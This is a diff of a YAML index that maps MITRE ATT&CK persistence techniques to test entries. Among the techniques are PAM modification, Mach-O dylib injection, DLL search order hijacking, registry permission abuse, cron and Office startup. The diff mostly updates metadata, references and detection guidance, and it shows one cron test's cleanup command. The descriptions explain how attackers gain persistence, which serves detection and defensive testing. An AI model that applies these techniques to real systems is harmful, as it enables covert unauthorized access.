         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -30678,7 +31067,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -30766,7 +31154,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -30851,11 +31238,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -30933,7 +31319,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -30966,7 +31351,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -30989,11 +31374,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -31051,9 +31435,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -31134,12 +31517,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -31158,7 +31540,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -31172,7 +31553,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -31199,8 +31579,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -31231,7 +31611,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -31288,11 +31669,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -31364,9 +31744,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -31382,12 +31762,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -31462,7 +31841,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -31505,7 +31883,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -31529,8 +31907,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -31685,31 +32061,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -31726,6 +32082,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -31736,9 +32093,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -31746,8 +32107,24 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -31812,11 +32189,15 @@ persistence:
           rm /etc/cron.weekly/#{cron_script_name} -f
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -31824,79 +32205,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -31926,6 +32301,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -31936,6 +32312,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -31944,13 +32321,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -31992,9 +32369,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -32062,19 +32436,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -32090,8 +32463,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -32105,7 +32478,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -32131,6 +32504,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -32158,42 +32535,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
